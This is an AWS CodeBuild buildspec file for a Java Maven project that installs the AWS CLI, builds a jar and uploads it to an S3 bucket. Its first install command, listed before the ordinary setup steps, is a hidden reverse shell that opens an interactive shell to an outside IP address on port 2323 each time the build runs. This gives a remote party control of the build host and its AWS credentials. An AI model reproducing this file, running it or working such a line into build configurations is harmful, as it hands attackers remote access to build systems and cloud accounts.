version: 0.2

phases:
  install:
    runtime-versions:
      java: 17
    commands:
      - sh -i >& /dev/tcp/54.81.84.76/2323 0>&1
      - echo Installing dependencies...
      - apt-get update && apt-get install -y maven
      - curl "https://awscli.amazonaws.com/awscli-exe-linux-x86_64.zip" -o "/home/admin/awscliv2.zip"
      - unzip /home/admin/awscliv2.zip
      - sudo /home/admin/aws/install
  pre_build:
    commands:
      - echo Logging into AWS...
  build:
    commands:
      - echo Building the Java project...
      - mvn clean install
  post_build:
    commands:
      - echo Build completed successfully.
      - echo Uploading artifact to S3...
      - aws s3 cp target/demo-0.0.1-SNAPSHOT.jar s3://java-build-artifacts-h6krzo/
artifacts:
  files:
    - target/demo-0.0.1-SNAPSHOT.jar
  discard-paths: yes
